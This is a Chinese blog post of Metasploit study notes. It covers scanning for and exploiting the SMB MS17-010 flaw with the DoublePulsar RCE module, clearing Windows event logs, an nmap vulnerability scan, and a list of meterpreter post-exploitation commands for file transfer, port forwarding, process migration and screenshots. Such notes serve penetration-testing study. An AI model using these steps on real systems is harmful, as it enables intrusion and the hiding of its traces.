Metasploit 学习笔记
参考文章:
metasploit 使用教程_天空里的飞鸟的博客-CSDN博客_msfconsole
Metasploit用法详解 - 1_Ry - 博客园 (cnblogs.com)
MSF命令大全_L_lemo004的博客-CSDN博客_msf删除session
P4
基本操作
打开MSF:msfconsole
查找漏洞:search ms17-010
使用漏洞探测模块:use auxiliary/scanner/smb/smb_ms17_010
查看选项:options
设置目标主机:set rhost 127.0.0.2
批量探测设置主机:set rhost 127.0.1-128.1-254
开始探测:run
设置攻击模块:use exploit/windows/smb/smb_doublepulsar_rce
设置目标主机:set rhost 127.0.0.2
开始攻击:run
查看系统日志:run event_manager -i
清理系统日志:run event_manager -c
nmap扫描漏洞:nmap -T4 -A -v 192.168.1.133 --script=vuln
退出MSF:exit -y
1、基本命令(包含meterpreter和msf终端、ruby接口、目标shell交互的命令)
background(进程隐藏至后台)
sessions(查看已经成功获取的会话,-i 恢复会话)
quit(关闭当前会话)
shell (获取系统控制台shell,如果目标系统命令行可执行程序不存在或禁止访问, 则shell命令会出错)
irb(与Ruby终端交互,调用metasploit封装好的函数;在irb中还可以添加metasploit附加组件railgun,直接与windows本地API进行交互)
2、文件系统命令(与目标文件系统交互,包括查看、上传下载、搜索、编辑)
cat(目标系统文件交互)
getwd(获取目标机当前工作目录,getlwd本地当前工作工作目录)
upload(上传文件或文件夹到目标机 -r 递归)
download(从目标机下载文件或文件夹 -r 递归)
edit(调用vi编辑器,对目标上的文件进行编辑)
search(对目标机的文件进行搜索)
3、网络命令(查看目标网络状况、连接信息,进行端口转发等)
ipconfig(获取目标主机上的网络接口信息)
portfwd(端口转发:将目标主机开放但不允许访问的端口进行转发)
route(显示目标主机路由信息)
4、系统命令(查看目标系统信息、对系统进行基本操作等)
ps(查看目标机正在运行的进程信息)
migrate(将meterpreter会话进程迁移到另一个进程内存空间)
execute(在目标机上执行文件)
getpid(当前会话所在进程的pid值)
kill(终结指定的pid程序)
getuid(获取当前会话用户名)
sysinfo(获取系统信息)
shutdown(关闭目标主机)
5、用户接口命令
screenshot(截获被控主机当前桌面)
标签:Metasploit,run,查看,主机,笔记,目标,学习,会话,smb
From: https://www.cnblogs.com/Yu-0/p/17040374.html